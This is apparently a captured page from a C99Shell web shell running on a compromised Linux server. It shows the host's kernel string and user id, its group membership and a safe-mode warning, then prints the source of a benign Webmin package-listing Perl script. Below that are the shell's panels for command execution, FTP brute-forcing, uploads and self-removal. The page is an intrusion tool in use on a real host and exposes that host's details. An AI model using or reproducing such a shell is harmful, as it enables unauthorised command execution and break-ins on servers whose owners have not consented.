!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/software/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.cgi (3.3 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# index.cgi
# Lists all installed packages

require './software-lib.pl';
&ReadParse();
&ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1, 0,
    &help_search_link(defined(&package_help) ? ( &package_help() ) : ( ),
              "man", "doc"));

# Validate the package and update systems
$err = !defined(&check_package_system) ? $text{'index_echeckpackage'}
                       : &check_package_system();
if ($err) {
    &ui_print_endpage(&text('index_epackagecheck', $err,
                "../config.cgi?$module_name"));
    }
$err = !defined(&check_update_system) ? $text{'index_echeckupdate'}
                      : &check_update_system();
if ($err) {
    &ui_print_endpage(&text('index_eupdatecheck', $err,
                "../config.cgi?$module_name"));
    }

my $hasup = $has_update_system && defined(&update_system_form);
print &ui_tabs_start([ [ 'pkgs', $text{'index_tabpkgs'} ],
               [ 'install', $text{'index_tabinstall'} ],
               $hasup ? ( [ 'update', $text{'index_tabupdate'} ] )
                  : ( ) ],
             'tab', $in{'tab'} || 'pkgs', 1);

# Show package search and list forms
print &ui_tabs_start_tab("tab", "pkgs");
print &text('index_finddesc', &package_system()),"<p>\n";

# Search for a package
print &ui_form_start("search.cgi");
print &ui_submit($text{'index_findtext'}),"\n";
print &ui_textbox("search", undef, 40),"\n";
print &ui_hidden("goto", 1),&ui_form_end(),"<br>\n";

# Show search form by file, if supported by package system
if (!$no_package_filesearch) {
    print &ui_form_start("file_info.cgi");
    print &ui_submit($text{'index_identok2'}),"\n";
    print &ui_textbox("file", undef, 50),"\n",
          &file_chooser_button("file", 0, 3);
    print &ui_form_end(),"<br>\n";
    }

print &ui_form_start("tree.cgi");
print &ui_submit($text{'index_tree2'}),"\n";
print &ui_form_end(),"\n";

print &ui_tabs_end_tab("tab", "pkgs");

# Show form to install a new package
print &ui_tabs_start_tab("tab", "install");
print &text('index_installmsg', &package_system()),"<p>\n";

@opts = ( );
if (!$no_package_install) {
    push(@opts, [ 0, $text{'index_local'},
              &ui_textbox("local", undef, 50)."\n".
              &file_chooser_button("local", 0, 2) ]);
    push(@opts, [ 1, $text{'index_uploaded'},
              &ui_upload("upload", 50) ]);
    push(@opts, [ 2, $text{'index_ftp'},
              &ui_textbox("url", undef, 50)."\n".
              ($has_search_system ? &capture_function_output(
                        \&search_system_input) : "") ]);
    }
if ($has_update_system) {
    push(@opts, [ 3, $text{$update_system.'_input'},
          &ui_textbox("update", undef, 30)."\n".
          &update_system_button("update", $text{$update_system.'_find'}).
          (defined(&show_update_system_opts) &&
               ($opts = &show_update_system_opts()) ? "<br>".$opts : "") ]);
    }
if (@opts) {
    $upid = time().$$;
    print &ui_form_start("install_pack.cgi?id=$upid", "form-data", undef,
                 &read_parse_mime_javascript($upid, [ "upload" ])),"\n";
    if (@opts > 1) {
        print &ui_radio_table("source", $opts[0]->[0], \@opts);
        }
    else {
        print "<b>",$opts[0]->[1],"</b> ",$opts[0]->[2],"<p>\n";
        print &ui_hidden("source", $opts[0]->[0]);
        }
    print &ui_submit($text{'index_installok'}),"\n";
    print &ui_form_end();
    }
print &ui_tabs_end_tab("tab", "install");

if ($hasup) {
    print &ui_tabs_start_tab("tab", "update");
    &update_system_form();
    print &ui_tabs_end_tab("tab", "update");
    }

print &ui_tabs_end(1);

&ui_print_footer("/", $text{'index'});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--